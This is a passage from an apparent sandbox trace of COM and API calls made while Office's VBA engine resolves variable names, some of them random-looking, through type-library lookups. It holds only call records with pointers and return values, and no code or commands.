(This=0x665ba50) returned 0xe [0069.682] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NAxUwoA", lHashVal=0x10bc0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.682] IUnknown:Release (This=0x665ba50) returned 0xd [0069.682] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.682] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NAxUwoA", lHashVal=0x10bc0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.682] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.682] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.682] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NAxUwoA", lHashVal=0x10bc0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.682] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.682] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.682] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NAxUwoA", lHashVal=0x10bc0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.683] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.683] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.683] IUnknown:Release (This=0x665ba50) returned 0xd [0069.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870ace, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_NAxUwoA") returned 15 [0069.683] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NAxUwoA", lHashVal=0x10bc0d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x77005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x77005500000000, pDummy=0x0) returned 0x0 [0069.683] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81836 | out: _Dst=0x144ec0) returned 0x0 [0069.683] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DDABwk_", lHashVal=0x10c661, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8185e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DDABwk_") returned 8 [0069.683] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DDABwk_", lHashVal=0x10c661, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8185e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DDABwk_") returned 8 [0069.683] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DDABwk_", lHashVal=0x10c661, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.683] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDABwk_") returned 0x10c661 [0069.683] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="DDABwk_" | out: _Dst="DDABwk_") returned 0x0 [0069.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="DDABwk_") returned 8 [0069.683] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.683] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="DDABwk_", lHashVal=0x10c661, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.683] IUnknown:Release (This=0x665ba50) returned 0xd [0069.683] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.683] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="DDABwk_", lHashVal=0x10c661, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.683] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.683] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.683] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="DDABwk_", lHashVal=0x10c661, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.684] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.684] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.684] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="DDABwk_", lHashVal=0x10c661, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.684] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8185e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DDABwk_") returned 8 [0069.684] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DDABwk_", lHashVal=0x10c661, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.684] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.684] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8185e | out: _Dst=0x67c2d40) returned 0x0 [0069.684] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_DDABwk_") returned 0x10c9e5 [0069.684] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_DDABwk_" | out: _Dst="_B_var_DDABwk_") returned 0x0 [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_DDABwk_") returned 15 [0069.684] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.684] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_DDABwk_", lHashVal=0x10c9e5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.684] IUnknown:Release (This=0x665ba50) returned 0xd [0069.684] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.684] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_DDABwk_", lHashVal=0x10c9e5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.684] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.684] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.684] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_DDABwk_", lHashVal=0x10c9e5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.684] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.684] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.684] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_DDABwk_", lHashVal=0x10c9e5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.684] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.684] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.684] IUnknown:Release (This=0x665ba50) returned 0xd [0069.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870afe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_DDABwk_") returned 15 [0069.684] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DDABwk_", lHashVal=0x10c9e5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0) returned 0x0 [0069.685] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8185e | out: _Dst=0x144ec0) returned 0x0 [0069.685] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KAkoDQ", lHashVal=0x103d55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81886, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KAkoDQ") returned 7 [0069.685] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KAkoDQ", lHashVal=0x103d55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81886, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KAkoDQ") returned 7 [0069.685] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KAkoDQ", lHashVal=0x103d55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAkoDQ") returned 0x103d55 [0069.685] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KAkoDQ" | out: _Dst="KAkoDQ") returned 0x0 [0069.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KAkoDQ") returned 7 [0069.685] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.685] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KAkoDQ", lHashVal=0x103d55, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.685] IUnknown:Release (This=0x665ba50) returned 0xd [0069.685] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.685] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KAkoDQ", lHashVal=0x103d55, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.685] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.685] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.685] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KAkoDQ", lHashVal=0x103d55, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.685] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.685] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.685] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KAkoDQ", lHashVal=0x103d55, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.685] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81886, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KAkoDQ") returned 7 [0069.686] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KAkoDQ", lHashVal=0x103d55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.686] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.686] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81886 | out: _Dst=0x67c2d40) returned 0x0 [0069.686] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KAkoDQ") returned 0x10b7fe [0069.686] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KAkoDQ" | out: _Dst="_B_var_KAkoDQ") returned 0x0 [0069.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KAkoDQ") returned 14 [0069.686] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.686] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KAkoDQ", lHashVal=0x10b7fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.686] IUnknown:Release (This=0x665ba50) returned 0xd [0069.686] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.686] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KAkoDQ", lHashVal=0x10b7fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.686] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.686] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.686] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KAkoDQ", lHashVal=0x10b7fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.686] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.686] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.686] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KAkoDQ", lHashVal=0x10b7fe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.686] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.686] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.686] IUnknown:Release (This=0x665ba50) returned 0xd [0069.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870b2e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KAkoDQ") returned 14 [0069.686] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KAkoDQ", lHashVal=0x10b7fe, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44006f00000000, pDummy=0x0) returned 0x0 [0069.686] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81886 | out: _Dst=0x144ec0) returned 0x0 [0069.687] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.687] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.687] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.687] IUnknown:Release (This=0x665ba50) returned 0xd [0069.687] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.687] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.687] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.687] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.687] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.687] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.687] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.687] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.687] IUnknown:Release (This=0x665ba50) returned 0xd [0069.687] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.687] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.687] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.687] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.688] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.688] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.688] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.688] IUnknown:Release (This=0x665ba50) returned 0xd [0069.688] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.688] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.688] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.688] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.688] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.688] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.688] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.688] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.688] IUnknown:Release (This=0x665ba50) returned 0xd [0069.688] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.688] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.688] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.688] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.688] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.688] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.688] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.688] IUnknown:Release (This=0x665ba50) returned 0xd [0069.688] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.688] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.689] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.689] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.689] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.689] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.689] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.689] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.689] IUnknown:Release (This=0x665ba50) returned 0xd [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.689] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.689] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.689] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.689] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.689] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.689] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.689] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.689] IUnknown:Release (This=0x665ba50) returned 0xd [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.689] 